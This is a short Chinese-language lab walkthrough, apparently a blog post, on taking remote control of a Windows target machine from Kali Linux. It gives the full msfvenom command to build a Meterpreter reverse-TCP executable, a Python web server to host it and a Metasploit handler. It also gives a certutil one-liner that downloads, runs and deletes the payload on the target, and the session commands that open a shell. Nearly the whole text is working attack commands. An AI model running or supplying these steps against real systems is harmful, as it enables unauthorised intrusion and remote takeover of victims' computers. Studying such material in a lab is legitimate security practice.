靶机地址：windows 192.168.1.84

攻击者地址：192.168.20.44 kali

 

在kali当中生成脚本 msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.20.44 lport=7070 -f exe -o /tmp/win.exe

 

 

 

在kali当中，执行 cd /tmp 进入刚刚生成脚本的目录

 

 

执行 python -m SimpleHTTPServer 80

去目标机器，也就是靶机*问 

 

 访问出现这样的，说明访问成功

下一步：开启监听，在kali服务器上输入 msfconsole命令，进入MSF

等模块加载完成，输入：handler -p windows/meterpreter_reverse_tcp -H 192.168.20.44 -P 7070 （如果报错，就手动输入）

输入完成以后，去靶机上打开cmd  执行：cmd.exe /c "certutil.exe -urlcache -split -f http://192.168.20.44/win.exe &win.exe &del win.exe"

 

然后就可以看到成功建立连接了

再次执行sessions  看看会话

这时候就多了一条记录，执行  sessions -i 1  就能打开会话，这个时候就进入了对方系统